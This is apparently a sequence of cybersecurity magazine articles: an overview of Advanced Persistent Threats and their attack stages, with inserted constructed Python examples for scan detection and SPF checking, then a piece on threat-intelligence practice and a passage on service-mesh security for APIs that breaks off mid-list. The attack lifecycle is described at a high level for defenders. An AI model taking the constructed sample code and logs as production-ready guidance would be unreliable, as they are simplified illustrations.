The term Advanced Persistent Threat, or APT, entered the general terminology of the information security profession in mid-January 2010, when Google announced that its intellectual property had been the victim of a targeted attack originating in China. Google was not the only one; more than 30 other technology companies, military contractors and large enterprises were hacked by attackers who used a suite of social engineering, targeted malware, and surveillance technologies to secretly gain access to piles of sensitive corporate data [1].

Mariana Peycheva is CSO for the Unified Communications and Collaboration division of Atos.
Google's public recognition raised the issue of targeted long-term attacks by well-prepared attackers seeking access to corporate property and military information. It also launched a series of vendors promoting promising anti-APT products and services that only obscure the issue for security managers and operations managers [1]. The US Air Force coined the phrase Advanced Persistent Threat in 2006, as their teams needed to communicate with partners in the unclassified public administration world. People from the Department of Defense usually give classified names to specific threats and attackers and use them to describe the activities of the participants in those threats. If the Air Force wanted to talk about some intrusion with other personnel, they would not be able to use the classified name of the threat actor. Therefore, they built the term APT as an unclassified nickname [1]. In the early stages, such attacks were aimed at government or financial organizations, but now the domain is much larger. APT refers to specific threat actors; it does not refer to vague and shady internet powers. The term is most commonly applied to various groups operating in the Asia-Pacific region. Those who are familiar with APT activities may have an honest dispute about whether the term should be used to refer only to some participants in the Asia-Pacific region [1] or whether it can be expanded into a general classifier. In other words, if criminals from Eastern Europe work using the same tools, tactics, and procedures as traditional APTs, will these actors also bear the APT label? The answer to this question depends on the person asking it. An IT security specialist in a private organization will usually not be interested in whether the threat actors attacking the company are from Asia-Pacific or Eastern Europe, because they perform the same defensive actions regardless of the location or nationality of the opponent.
However, anyone with legal and/or national security responsibility who implements diplomatic, intelligence, military or economic measures will undoubtedly want to determine the origin of an attack [1]. For a long time there was no clear understanding of what APT is. Several factors contributed to the overall sense of confusion:
• With no details to discuss, the security community turned to just about anyone ready to talk about the incident. In too many cases, the speakers turned out to be vendors who saw APT as a marketing opportunity to recover fast-falling security spending [1].
• Many analysts were strictly focused on the elements of the incident that they understood best, irrespective of the true nature of the event [1]. Companies that specialize in botnet research assumed that botnets were involved; others focused on vulnerability identification and exploit development. Unfortunately, botnets have nothing to do with APT, and vulnerabilities, exploits, and malware are just elements of APT incidents, not their core functions.
• Impact of APT: economic advantages, strategic benefits, and the theft of sensitive information. The goals can be political, such as undermining internal stability, or economic, based on the theft of the victims' intellectual property. Logically there are also technical objectives that extend the ability to complete the mission. These include gaining access to source code to develop exploits further, or to study how security products work in order to better defeat or break them. The most worrying thing is that attackers can make changes to improve their positions and weaken the victim [1].
Analysts rate APT activity as having four main goals and describe the adversary as follows:
Advanced means that the adversary can operate across the full spectrum of computer intrusion. They can use the most trivial, publicly available exploits against well-known vulnerabilities, or elevate their game to researching new vulnerabilities and developing custom exploits, depending on the situation of the target.
Persistent means that the adversary has been given the specific task of completing its mission. These are not opportunistic attackers. They receive directives from their superiors in the same way as an intelligence group. Being persistent does not necessarily mean that they are continually executing malicious code on victims' computers [1]. Instead, they maintain the level of engagement necessary to fulfil their purpose.
Threat means that the adversary is not a piece of mindless code. It is a threat that is organized, funded, and motivated. Some people talk about many "groups" consisting of specialized "crews" with a variety of missions [1].
A traditional attack is usually performed by one person: aggressive, very rapid, smash-and-grab, based on a minimal time window. An APT, by contrast, involves repeated attempts using several methods and a stealthy approach; it adapts to resist defenses and is very slow so as to avoid suspicion, and it may involve sleep modes before commencing any attack [2]. As already mentioned, there are cyber espionage groups associated with various APT attacks.
In 2018, Trend Micro security researchers reported an attack using Android malware matching Bahamut's code (Bahamut being the Mobile Device Management (MDM)-based campaign detected targeting iPhone devices in India), but which connects to its command and control (C&C) infrastructure. Some of these C&Cs, which also act as phishing sites, attempt to lure users into downloading malicious applications via links to Google Play. Such applications and code can retrieve network information and the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, steal files with specific extensions, and even take screenshots of messages. In short, an APT is an adversary who conducts computer network operations to maintain awareness of the status of its targets. APT is characterized by its persistence in maintaining some degree of control over the target's computer infrastructure, acting continuously to preserve or restore control and access. At informal counterintelligence and military meetings, analysts use the term "aggressive" to emphasize the extent to which an APT pursues its goals against various governmental, military, and private targets.
Let's take a deeper look at the APT methodology. The APT attack is based on four or five stages, but generally it can be summarized as breaking in, scanning the network, identifying the target, making it accessible to accomplish the goal, and escaping the network without leaving any trace or evidence [2].
1. Information gathering. At stage one, the attacker can use different techniques like social engineering, open-source intelligence (OSINT) tools, or approaching an organization which sells data or information about multinational firms. This step aims to know the target and gather as much information as possible about it. As there are countless ways to conduct the initial step of infiltration, defining a security baseline or a model to stop the initial attack is quite a challenge. Given the persistent approach in APT, it is only a matter of time before an attacker finds a hole in the security mechanisms [2].
2. Breaking in. We can expect that the attacker will exploit the weakness and gain access to the target network. They can use an indirect technique such as spear phishing, a watering hole attack, or a zero-day exploit to infiltrate and deploy a remote access tool for further activities. A common approach is email combined with social engineering: a targeted user receives a link in an email from a seemingly reliable person or source, which brings the user to a website containing a malicious JavaScript payload that the browser downloads and executes. They can simply send an attachment in an email purporting to come from a reliable source, or use an infected USB device which, when attached to a Windows-based system, auto-executes malware without user interaction by exploiting a zero-day vulnerability. A different, direct approach is easy to understand: the attacker can compromise any third party working at the organization and use their privileges to gain access to any system or server [2].
3. Identifying the target. As the name suggests, in this stage the attacker searches for and identifies the target data. The chances of being caught are quite high, as the attacker will be scanning the network for its target, and this can result in abnormal traffic behavior, trespassing on data files, or access violations on the network [2]. If the attacker succeeds in identifying the targets, they have to make them accessible or acquire the appropriate rights to access that data. Rootkits can also be secretly installed on targeted systems and network access points to monitor or capture data and commands as they stream over the network. The captured information can be used to give intruders what they need to plan future attacks or to make the target data accessible. At this stage, being persistent is a key feature for stealing the information [2].
4. Fleeing the network. Finally, the attacker will try to escape and cover their tracks, so that it becomes more challenging to identify the attacker and to detect the damage done. In some cases, the attacker uses the APT to gain long-term access, or drops a back door so that the network can be accessed whenever required [2].
APT is a phase-based approach, usually of three to four stages, and most organizations are not even aware that an APT attack has happened on their network [2].
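The target-identification stage above is where a defender has the best chance of catching the intruder, because scanning for the target shows up as abnormal traffic (one source suddenly touching many hosts, or many ports on one host) and as access violations (a burst of denied connections from one source). The following added example, which is not code from the article, runs that detection logic over a constructed connection log; the log layout (timestamp, source, destination, port, action), the addresses, and the thresholds are assumptions chosen for illustration.

```python
"""Detection logic for the target-identification stage (added example, not
from the article). Flags fan-out (one source touching many hosts, or many
ports on one host, inside a short window) and access violations (a burst of
denied connections). Log layout and thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from any real network). Assumed layout:
#   <ISO timestamp> <src ip> <dst ip> <dst port> <allow|deny>
# 10.0.5.40 is a normal workstation, 10.0.5.23 sweeps twelve hosts on SMB
# within seconds, 10.0.5.60 collects three denies spread over hours.
SAMPLE_LOG = """\
2019-06-03T09:00:01 10.0.5.40 10.0.7.10 445 allow
2019-06-03T09:00:30 10.0.5.40 10.0.7.11 443 allow
2019-06-03T09:01:10 10.0.5.40 10.0.7.10 445 allow
2019-06-03T09:02:00 10.0.5.23 10.0.7.1 445 allow
2019-06-03T09:02:01 10.0.5.23 10.0.7.2 445 deny
2019-06-03T09:02:02 10.0.5.23 10.0.7.3 445 allow
2019-06-03T09:02:03 10.0.5.23 10.0.7.4 445 deny
2019-06-03T09:02:04 10.0.5.23 10.0.7.5 445 allow
2019-06-03T09:02:05 10.0.5.23 10.0.7.6 445 deny
2019-06-03T09:02:06 10.0.5.23 10.0.7.7 445 allow
2019-06-03T09:02:07 10.0.5.23 10.0.7.8 445 allow
2019-06-03T09:02:08 10.0.5.23 10.0.7.9 445 deny
2019-06-03T09:02:09 10.0.5.23 10.0.7.10 445 allow
2019-06-03T09:02:10 10.0.5.23 10.0.7.11 445 allow
2019-06-03T09:02:11 10.0.5.23 10.0.7.12 445 allow
2019-06-03T09:40:00 10.0.5.60 10.0.7.10 22 deny
2019-06-03T11:00:00 10.0.5.60 10.0.7.10 22 deny
2019-06-03T12:30:00 10.0.5.60 10.0.7.10 22 deny
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (allow|deny)$")


def parse_log(text):
    """Return time-sorted (ts, src, dst, dport, action) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, dport, action = m.groups()
            events.append((datetime.fromisoformat(ts), src, dst, int(dport), action))
    return sorted(events)


def _windows(events, window):
    """Yield each slice of time-sorted events whose time span does not exceed window."""
    start = 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        yield events[start:end + 1]


def _by_source(events):
    groups = defaultdict(list)
    for ev in events:
        groups[ev[1]].append(ev)
    return groups


def detect_sweeps(events, window=timedelta(minutes=5), min_hosts=10, min_ports=10):
    """Flag sources contacting >= min_hosts distinct hosts, or >= min_ports distinct
    ports on a single host, inside any window. Returns {src: reason}."""
    alerts = {}
    for src, evs in _by_source(events).items():
        for win in _windows(evs, window):
            hosts = {e[2] for e in win}
            if len(hosts) >= min_hosts:
                alerts[src] = f"host sweep: {len(hosts)} hosts within {window}"
                break
            ports_per_host = defaultdict(set)
            for e in win:
                ports_per_host[e[2]].add(e[3])
            widest = max(len(p) for p in ports_per_host.values())
            if widest >= min_ports:
                alerts[src] = f"port scan: {widest} ports on one host within {window}"
                break
    return alerts


def detect_access_violations(events, window=timedelta(minutes=5), min_denies=3):
    """Flag sources with >= min_denies denied connections inside any window.
    Denies spread over hours (10.0.5.60 above) stay below the threshold."""
    denied = [e for e in events if e[4] == "deny"]
    alerts = {}
    for src, evs in _by_source(denied).items():
        for win in _windows(evs, window):
            if len(win) >= min_denies:
                alerts[src] = f"{len(win)} denies within {window}"
                break
    return alerts


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for kind, hits in (("sweep", detect_sweeps(evs)), ("violation", detect_access_violations(evs))):
        for src, reason in hits.items():
            print(f"{kind}: {src} -> {reason}")
```

The thresholds are the tuning knob: a backup server or a vulnerability scanner legitimately fans out to many hosts, so in production such sources go on an allow-list and the window and counts are set from a baseline of normal traffic rather than the values assumed here. Note that 10.0.5.60, which also accumulates three denies, is not flagged because its denies are hours apart; counting denies without a time window would have produced a false positive there.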
How to protect against APT? This is not a simple attack, but one logically designed and composed of numerous hacking tools and processes following a sophisticated pattern to achieve its objective. The victim is "inspected" constantly over a long period. The attackers are not "script kiddies" but possess a high level of knowledge and plenty of resources, so we should not expect a simple solution. Many of the "classic" security tools are unable to handle this purposeful and carefully planned attack. For example, when using software that may be untrustworthy, it is essential to run it in a sandbox so that other software, files, and applications are not compromised [3]. If no adverse actions are detected after a while, the code is assumed to be safe and is allowed to execute. But malware developers are smart, and they can bypass this detection technique by having their code sit dormant for days or even weeks before activating and wreaking havoc. To react to this threat we must first discover and analyze it. Network traffic analysis, which follows the traffic and the applications, is one of the necessary components of a layered defense. Ideally, there will be an engine that identifies malware and activity signaling an attempted attack; detection intelligence of this kind aids rapid response. Email security is a hot topic nowadays. Different advanced malware detection techniques identify and block spear-phishing emails; as we saw from the example structure of the attack, phishing is the initial phase of most targeted attacks. They can discover malicious content, attachments, and URL links that pass unnoticed through standard email security. Endpoint security, with monitoring that records and reports detailed system activity so that threat analysts can rapidly assess the nature and extent of an attack, is also a mandatory part of a sophisticated defense.
Most forms of malware and advanced persistent threats enter the enterprise through vulnerable endpoints [4]. Detecting malware based on file signatures or blacklisting has proved to be a very inefficient technique in the fight against APT. Following customer needs, security vendors have started to take radically new approaches to combating malware and APTs. For example, Trend Micro Deep Discovery solutions for network, email, endpoint, and integrated protection provide advanced threat protection [5]. It was designed as a management solution to help large enterprise and government organizations. It provides network-wide visibility, a significant control needed in this kind of protection; detection engines focused on identifying advanced malware and human attackers; and a real-time dashboard presenting the in-depth analysis and actionable intelligence required to prevent, discover, and contain attacks against corporate data, alongside a console providing real-time threat visibility and detailed scrutiny in an intuitive multi-level format. Security professionals can then focus on risks and deep forensic analysis, and rapidly implement containment and remediation procedures [6].
Trend Micro is not the only vendor to focus attention on APT. McAfee claims that their Advanced Threat Defense combines in-depth static code analysis, dynamic analysis (malware sandboxing), and machine learning to increase zero-day threat detection, including threats that use evasion techniques and ransomware, which allows hidden risks to be uncovered. Alongside the threat intelligence sharing option, which makes immediate sharing of threat intelligence across the entire infrastructure possible, the solution supports offline analysis options, and advanced features enable security operations centers to validate threats. The centralized analysis covers multiple protocols and recommended products, including email gateways. Surely, going through the different vendors, we will find that most of them provide sophisticated solutions which can support security professionals in their efforts against APT.

To conclude, an APT is a layered attack; therefore, the defense should be designed in layers too. Start with phishing campaigns whose aim is not to "catch" the unprepared employee but to give us a clear understanding of how vulnerable the human factor in the organization is. There should be procedures and policies that implement regular and mandatory training for employees: how to recognize phishing, how to report it, and how to protect themselves and the enterprise. Security professionals should never forget that the employees are the first line of defense. Other policies can forbid any server outside the company premises from sending email from the organization's domain, combined with operational security on the email gateway. Other functional security techniques should be implemented regularly at the mail gateway level, and there are many good alternatives already offered by vendors.
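The policy just described (only the organization's own servers may send mail for its domain, enforced at the gateway) is what an SPF record on the domain expresses. The following added example, not code from the article or from any vendor named in it, is a simplified SPF evaluator of the kind a mail gateway runs against the connecting server's IP address; the domain, the v=spf1 record and the addresses are constructed, and it evaluates only the ip4, ip6 and all mechanisms with no DNS lookups, so include, a, mx, exists and the redirect= modifier are reported as unresolvable rather than guessed.

```python
"""Simplified SPF check as a mail gateway would apply it (added example, not
from the article). Evaluates a domain's v=spf1 record against the IP of the
connecting mail server so that only the organization's own relays may send as
the domain. Only ip4, ip6 and all are supported; no DNS lookups are performed.
The domain, record and addresses below are constructed for illustration."""
import ipaddress

# Constructed record for an assumed domain example.org: the on-premises relays
# in 203.0.113.0/24 and 2001:db8:1::/48 may send; "-all" hard-fails everyone else.
EXAMPLE_SPF = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8:1::/48 -all"

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Split a v=spf1 record into (qualifier, mechanism, argument) terms."""
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    terms = []
    for term in parts[1:]:
        qual = "+"  # RFC 7208: a missing qualifier means pass
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        terms.append((qual, mech.lower(), arg))
    return terms


def check_spf(sender_ip, record):
    """Return (result, matched_term). Terms are tested left to right and the
    first match wins. Mechanisms that need DNS (include, a, mx, exists, and the
    redirect= modifier) cannot be resolved offline and yield permerror instead
    of a guessed answer."""
    ip = ipaddress.ip_address(sender_ip)
    for qual, mech, arg in parse_spf(record):
        if mech in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror", f"{qual}{mech}:{arg}"
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qual], f"{qual}{mech}:{arg}"
        elif mech == "all":
            return QUALIFIERS[qual], f"{qual}all"
        else:
            return "permerror", f"{qual}{mech}:{arg}"
    return "neutral", None  # nothing matched and no "all" term: RFC default


def gateway_decision(sender_ip, record):
    """Map the SPF result to an assumed gateway policy: reject on fail,
    quarantine on softfail or permerror, accept pass and neutral."""
    result, term = check_spf(sender_ip, record)
    action = {"fail": "reject", "softfail": "quarantine", "permerror": "quarantine"}.get(result, "accept")
    return action, result, term


if __name__ == "__main__":
    for ip in ("203.0.113.25", "2001:db8:1::10", "198.51.100.7"):
        print(ip, gateway_decision(ip, EXAMPLE_SPF))
```

The reject/quarantine/accept mapping is an assumed local policy, not part of the SPF standard. A production gateway resolves include, a and mx through DNS within the lookup limit, and combines the SPF result with DKIM and DMARC rather than acting on SPF alone, since SPF checks the envelope sender and says nothing about the From header the user actually sees.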
Good security protection at host level, plus tools that security teams can use to monitor end-system behavior offline or, even better, integrated automated intelligence. As discussed, network security should be armed with tools for network traffic analysis which recognize malicious behavior. And finally, the organization should invest in good security professionals; different kinds of security knowledge are needed across the different teams. Leaders should understand that investment in their employees, continuous education and clarification, and better knowledge is mandatory. According to a study by ISACA, phishing is the most common way of launching an APT, as it gives the attacker an opportunity to gain initial access to the organization, and, considering the human factor as one of the biggest vulnerabilities, this makes the defense mechanism against initial attacks very difficult to design. It was evident from the study that 53.4% of respondents believe APT is not much different from traditional attacking methods. However, 93.9% agreed that APTs pose a significant threat to national security and economic stability. Among the critical findings of the survey are that 63% of respondents believe that it is just a matter of time before their organization becomes a victim of an APT attack, while only 60% believe that they are capable enough to stop such an attack [2]. The most effective fight against APT is having trained and knowledgeable information security analysts. Many security providers have adopted APT in their advertising. Some offer the opportunity to detect APT in the potential victim's networks. Another has even registered APT domain names. Tools are always helpful, but the best advice I can provide is to educate business leaders about threats so that they support organizational security programs drawn up by competent and knowledgeable employees [1]. An APT can be considered one of the most threatening security concerns. As the world advances towards IoT (the Internet of Things), certain measures need to be taken so that APT attacks can be handled with ease [2]. At a technical level, building visibility will provide the organization with awareness of the situation and a chance to detect and thwart APT activity. Without information from the network, hosts, logs, and other sources, even the most skilled analyst is rendered helpless. Fortunately, obtaining such information is not a new challenge, and most security departments already run such programs [1]. The purpose of combating APT operations should be to make it as difficult as possible for an adversary trying to steal intellectual property, or, as some say, to increase its price per megabyte.

References:
1. https://searchsecurity.techtarget.com/magazineContent/Understanding-the-advanced-persistent-threat
2. https://pdfs.semanticscholar.org/c6c3/06e7e4253885bd2d0ed25b8f2524fbbb2a92.pdf
3. https://www.techopedia.com/definition/25266/sandboxing
4. https://www.networkworld.com/category/advanced-persistent-threats/?start=20
5. https://interwork.com/wp-content/uploads/2016/12/sb01_dd_overview_140526us.pdf
6. https://www.helpnetsecurity.com/2012/03/01/trend-micro-unveils-apt-management-solution/
The Threat Intelligence EASY Button

Introduction
We have all seen it. Ineffective threat intelligence is happening across the globe. There are teams writing resource-intensive weekly products that many will not read. There are companies buying intelligence feeds that will not be operationalized. There are intelligence teams that are not aligned to their stakeholders, and there is no process to gather the feedback needed to make course corrections. This article is not an attempt to belittle the efforts of budding intelligence teams. This article aspires to be a guide for those building, executing, or consuming threat intelligence.

Chris Cochran is former active duty US Marine Intelligence. Chris has dedicated his career to building advanced cybersecurity and intelligence capabilities for national-level governments and the private sector. He has led intelligence programs at the National Security Agency, US Cyber Command, US House of Representatives, and financial and high-tech sector companies. He currently leads the threat intelligence and operations program at Netflix. Chris has made it his personal mission to motivate and empower cybersecurity professionals and teams through coaching, his podcast, and speaking engagements. His concern for the ever-growing cyber skills gap serves as a motivator for his need to inspire the next generation of cyber warriors to take the helm.
The more I grow in my career, the more I look to give back to the professionals making their way through the cybersecurity landscape. I found myself answering the same messages and questions about threat intelligence. One day I thought to myself, "Wouldn't it be great to have a threat intelligence EASY button that people could press to help guide them through this process?" I have spent my career coaching intelligence analysts and teams, and 85% of that advice can be boiled down to four simple, but sometimes difficult, concepts that serve as a touchstone for intelligence leaders and practitioners. These concepts are:
• Elicit Requirements
• Assess Collection Plan
• Strive for Impact
• Yield to Feedback
There you have it, the Intelligence EASY Button. These concepts are what I have always done, and with a dab of creativity I was able to distill my philosophy into digestible nuggets. Let's take some time to look at each of these individually.

Elicit Requirements
"It's not me, it's you." - Lily Allen
If you have been following my LinkedIn for a while or listen to my podcast, I have foot-stomped this concept on many occasions. Threat intelligence teams, companies, and experts are in the "service" business. We support OTHER functions. While I do believe threat intelligence leads security, our work is not about us, it is about our stakeholders. We need to know what information they require that will make their jobs more efficient, more effective, or change what they are doing entirely. You will encounter some stakeholders that do not know what information will aid those objectives. These are some of my favorite situations. You can have an "aha" moment right there with your stakeholders. Ask questions. Ask good questions. Practice asking questions and refine your stakeholder analysis. You will find that the more polished the requirements, the easier it is to support your stakeholders. You will want to do the best you can to get this right.
Requirements are the foundation of an intelligence program. I have been a part of teams where this was not done. We would project our own thoughts and biases into our support of other teams without gathering the stakeholders' thoughts or concerns. As you read this, I am sure you see how big a misstep this is. However, this is not likely an isolated incident. In fact, many of the teams I have coached missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the calendar and schedule meetings with your stakeholders. During the meeting, be present and listen more than you speak. Write down possible requirements and ask validation questions. You will then be on your way to building an effective program.

Assess Collection Plan
"Everybody has plans, until they get hit." - Mike Tyson
If you are starting a threat intelligence program and you have a fleshed-out collection plan before you did your first stakeholder interview, I assess with HIGH confidence that you will have to go back to the drawing board. Even after you have done stakeholder analysis and new requirements come up, you will have to look at what information you are currently using for your analysis. Ask yourself, "Is this feed answering the questions my stakeholders have?" Every feed is not for every team. A great source may not have the answers you are looking for. Constantly reassess your collection plan and be aggressive in trimming away the non-essential. When your requirements change, do some due diligence and make sure you can support them given your current collection posture. Threat feeds are not silver bullets for intelligence. Threat feeds can be an incredible force multiplier or a waste of funds. Efforts must be made to ensure you are using the vendors and feeds you pay for. Look at efficient ways to enrich your incident response using this data. Use your feed to reach quick determinations on the reputation of indicators. Distill TTPs into digestible data points for your detection and threat hunting capabilities. Optimize your resources and squeeze all of the functionality out of your feeds. Once you have practice at this, it will be easier to do the same for other solutions.

Strive for Impact
"What you do has far greater impact than what you say." - Stephen Covey
Let me paint a picture. You have spent the last two months working on a report you believe will change the game at your company. You were diligent in your analysis. You included the best research from world-renowned experts. You polished it up real nice with the help of a couple of editors. You even had marketing take a stab at making graphics for you. You deliver your masterpiece and... crickets. You wait a few days and ask, "Hey, what was the reception of the report?" Your boss replies, "It was great work! Everyone loved it. The only problem is they didn't understand the 'So what?'" Ouch... I have been there, and I am sure many of you have been there too.
The beauty of threat intelligence or intelligence in general is it has the ability, and often goal, of inciting change. The work I do can literally change the way my company operates, if I strive for impact in my intelligence analysis and reporting. Take some time and think about what information is going to who, in what context, and to support what decision, every time you hit send on that email. Let me let you in on a little secret. In my current role, I am cheating. I am responsible for threat intelligence and production, but I also lead threat operations AKA our purple team. There are many definitions of a purple team. The way we look at it: • Threat intelligence sets the threat context • The red team emulates that threat in conjunction with risk priorities set by the organization • The blue team, or threat hunters, are trying to find all of the malicious activity your security appliances are not, including the red team • Ultimately, you want to automate a successful hunt and add to your detections This process is incredibly powerful. You iteratively close gaps in the organization's security posture. I know what you must be thinking, “Chris, we do not have dedicated red teamers or threat hunters.” Neither do we at my current role. We have implemented a reservist model that allows people to step into those roles periodically so we can execute the mission without hiring dedicated teams. This reiterates the concept of optimizing what you have access to, including people. 19 The Threat Intelligence EASY Button
  • 21. Yield to Feedback “Feedback is the breakfast of champions.” - Ken Blanchard Before I even begin talking about using feedback, I feel obligated to provide a tip about receiving feedback. Please, make it easy for your stakeholder to present feedback. For instance, I built a simple Google form that I can send pre-filled with context data to the stakeholder that can be filled in under a minute, if they so wish. Subsequently, I produce a shareable link and personally message the stakeholder. I thank them for submitting the request for information and ask them to fill out the form. I also mention it will take only moments of their time. It is not my intent to boast, but under this construct I have a 100% return on my request for feedback. Now once you have your feedback, use it! Even if you believe your stakeholder is misaligned in some way, that still means the mark is being missed. Are your reports too long? Are they missing key details? Was your intelligence not actionable? Was the delivery medium wrong? Did it take too long? These are just a few examples of things that, while they can bruise the ego, can incrementally improve your intelligence reports and, ultimately, your intelligence program. There are two vital measurements I set as mandatory fields for feedback: relevance and impact. The great part about this is it ties back to our other tenants of the EASY button. Your relevancy should be high if you are answering the requirements set during the “Elicit Requirements” phase. These are the questions you need to answer for your stakeholder and if you send something that isn’t relevant but you felt met the requirement, it is time to readdress your requirements with your stakeholder. Impact is vital for “Strive for Impact.” Did the information help the stakeholder DO or DECIDE something? If the intelligence did, you are on the right track. If it didn’t, do a bit of analysis as to why. Maybe there was not enough context for the importance of the information. 
Maybe the message was not clear. Use feedback as a gift to make the program better. Conclusion I hope this helps the producers and the consumers of intelligence. Used correctly, threat intelligence can validate strategy bets for security, aid in the improvement of the security posture, and give impactful value to stakeholders around the organization. I also hope this demystifies intelligence and highlights the need to be proactive in security. In my philosophy, intelligence leads security. If you understand the threats your organization faces and you have your organization’s context in mind, you can get ahead of the ever-changing and never-ceasing threat. 20 The Threat Intelligence EASY Button
Securing the API Economy

API led digital transformation and security

More and more financial services organizations (FSI) are making customer experience a part of their key performance indicators. This change leads to an increasing focus on delivering a more personalized service rather than a cookie-cutter approach led by the constant churn of new products. Given the nature of their business, most FSI organizations have massive troves of data that can be tapped using modern computing paradigms such as advanced data analytics, hyper cloud and artificial intelligence. The insights learned can be used to provide a personalized, seamless experience in a multi-channel environment (e.g. mobile, web, connected devices, etc.).

Abhi Singh
Abhi is a Senior Manager at Deloitte's Cyber Risk practice. He focuses on Cyber Security issues at large Financial Services clients. He has over 17 years of information security experience. His current focus areas include perimeterless security architecture and leveraging blockchain for security use cases.
An application programming interface (API) based model is the most logical choice for this transformation. APIs make it easier to integrate and connect people, places, systems, data, things, and algorithms; create new user experiences; share data and information; authenticate people and things; enable transactions and algorithms; leverage third-party algorithms; and create new products/services and business models. However, in this rapidly scalable and interlinked environment, security often takes a back seat to business agility. Our attempt in this paper is to describe a few security paradigms that can be included as part of the core API based architecture to allow for agility and scalability.

Understanding the core architecture

One of the foundational elements of the API based architecture is loose interlinkage between different applications or parts within the application. This loose coupling provides extensibility, reliability, and scalability. An application can be thought of as a Lego kit built from several individual pieces (microservices)[1], each serving a specific role, which, when assembled in a definite manner (interfaces), form a defined structure. Here is a typical architecture pattern for accessing a bank account:

Fig 1. Simplified microservices based financial application high level architecture

In this (simplified) example, the user can query his information, such as bank balance, using an app developed by the bank, via a finances aggregator app developed by a 3rd party, or via a normal web interface. In each case, the customer-facing microservice renders the correct UI based on the access and populates the data with the help of an aggregator service.
The aggregator service (is supposed to) understand the data elements needed to satisfy the user query and connect to a data repository or a storage microservice to fulfill it. Each of these microservices is independent of the others and they interact using well defined interfaces[2]. This loose coupling brings many benefits, such as on-demand scaling of any microservice: for example, based on the number of users accessing their account, the UI microservice can scale up or down with demand without impacting the others. Other advantages include predictable response due to the well defined interface, lower computing overhead, faster time-to-market due to rapid releases, localized testing requirements, lower operational margins, and effective resource utilization by focusing resources on microservices rather than the entire application, amongst many others.

This architecture is usually implemented using containers such as Docker[3]. To achieve the basic tenets - automated application deployment, scaling, and management - these containers are managed using container orchestration systems like k8s[4] and Docker Swarm[5]. Given our focus on securing the above architecture, we will not go into the details of these orchestration systems. However, the footnotes provide an authoritative background on the most commonly used systems.

Key security issues in this container driven agile environment

Disregarding (for simplicity) the issues that manifest in a multi-cloud scenario, the traditional layered security defense doesn't work in this case. Here are some reasons (not an exhaustive list):

• External facing APIs present a great misuse target[6] as they can expose application logic and potentially sensitive data.
• Each microservice might have a small attack surface, but the combined attack surface of the overall system is hard to understand and defend.
• If each team can choose the language and frameworks for their microservice, it becomes extremely hard to manage the security risks in a standardized manner.
• There is no choke point in the flow or network, so logging, debugging, and access management become tricky.
• There is implicit trust in the underlying hosts (or SaaS services in the case of public cloud) to be secure and to provide segmentation based on the risks posed by each container.
• In many cases these container hosts are dynamically created, so enforcing the security measures that protect the container runtime can be a challenge.
• Given the seamless flow of information between the containers, there is a strong possibility of lateral movement if one of the containers is compromised. This issue can also lead to container/microservice hopping following the predictable pattern of application flow[7].
• Monitoring is a challenge as the environment changes dynamically, making it harder to correlate the data.
• Often microservices are made up of upstream proprietary and open source components. This can introduce downstream vulnerabilities[8].
• Managing encryption keys or shared secrets leveraged by a container is a challenge because of the lack of secure methods for deploying identifying keys in microservices. The encryption keys or secrets might also be hard coded into container images.
• Integrating identity and access management can be an issue, as there are multiple authentication and authorization mechanisms present in a company and not all of them may be compatible with the container.
• As the application becomes fragmented and communication is purely API based, the developers have less visibility into the overall flow or business logic. This can lead to accidental exposure of information.

The (castle-wall based) tools currently available might not be fully capable of handling the new challenges mentioned above. There aren't many firewalls that observe east-west flows within the data center, and managing access control lists in a dynamically changing environment is almost impossible.

Integrating security in the life cycle

The basic tenet of the challenges mentioned above is the breach of trust using something that we inherently trust, such as a workload running on a container[9]. This is the same as what we have in a traditional data center-based infrastructure, like a breach using a server running on an internal network. To create a fundamentally secure infrastructure, we probably should not place any inherent trust in the network, leading to each system/container/pod becoming an island.

Fig 2. Breach is essentially localized
However, to achieve this architecture, the following key capabilities are required:

• Every flow on this network is known: applications have the capability to engage in TLS based sessions.
• Every flow is authenticated and authorized: access control lists, encryption keys, and credentials need to be managed between microservices, all while services are being added or changed.
• The network by virtue implements least privilege without relying on developers for it.

This can be a manageability and scalability headache. One method to implement these capabilities is to use a "Service Mesh"[10]. This mesh determines how each service discovers the others (discovery) and talks to them (routing). This was previously done using load balancers in front of each service. Following this logic, most of these load balancers are manually managed, and if you were to add a new service, you would open a change ticket that would be serviced by IT. Load balancers introduce a cost penalty and an agility penalty, based on how fast an organization turns around the tickets, thereby defeating the overall purpose of rapidly scaling using microservices.

So, with a "Service Mesh":

• All service-to-service communications happen via the Service Mesh (implemented as a software component, a proxy, placed adjacent to each microservice).
• There is a central registry that is dynamically managed as service instances come online and go offline, so new workloads can query this central registry to find the IP addresses of the services that they want to connect to.
• There is native support for some network functions such as resiliency, service discovery, etc.
• Application developers can focus on the business logic while network and security functions are offloaded to the service mesh.
• Circuit breaking can be achieved as a native feature.
• The capabilities are language agnostic.
• Security controls (encryption, authentication, authorization) can be implemented, managed, and scaled dynamically without actually modifying the application.

In order to enforce these security requirements and decisions, the proxy needs access to the workload (container) identity. These identities need to be created, rotated, and managed as the workloads change. The second tenet is the repository of authorizations maintained for each service. At a high level, the architecture would look similar to:

Fig 3. High level design for enforcing security using a service mesh architecture

A policy server can be used to define identities using digital certificates and holds the keys to sign and validate these identities. The agents manage the certificate lifecycle and the distribution of the correct certificates to the right proxies.

Fig 4. Service-Mesh based flow

Advantages of the service mesh based design

Authentication becomes seamless, automated, and scalable:

• In this decoupled design, the application can continue to function if there is an outage in the control plane.
• Agents are only needed when the proxy boots or when the identity expires.
